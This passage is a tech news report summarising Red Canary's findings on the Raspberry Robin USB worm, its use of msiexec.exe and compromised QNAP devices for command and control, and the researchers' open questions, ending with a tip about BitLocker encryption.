According to Red Canary Intelligence, the malware has been visible since last fall and researchers with the company have been tracking it since then. From detections within a small subset of users, the issue has grown across more customers. If a corrupted USB drive is placed into a Windows machine, the worm can spread on the system by using a msiexec.exe to gain access to the users’ information: “This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.”
Intelligence Gaps
The research team says activity around the Raspberry Robin malware has been ramping up since the turn of the year. While it has been possible to see how the malware infiltrates a system, there are still some aspects of an attack researchers are not clear about. For example, Red Canary still does not know how Raspberry Robin infests the external drives, simply putting it down to a potential offline infection “outside of our visibility”. Moreover, the team is uncertain about how the worm installs the malicious DLL on a Windows system. “We have several intelligence gaps around this cluster, including the operators’ objectives. While we don’t yet have the full picture, we want to share what we know about this activity cluster so far to enrich collective understanding of this threat and empower defenders to identify this activity.” You can check out the technical details in the full write up from Red Canary Intelligence. Tip of the day: Did you know that your data and privacy might be at risk if you run Windows without encryption? A bootable USB with a live-linux distribution is often just enough to gain access to all of your files. If you want to change that, check out our detailed BitLocker guide where we show you how to turn on encryption for your system disk or any other drive you might be using in your computer.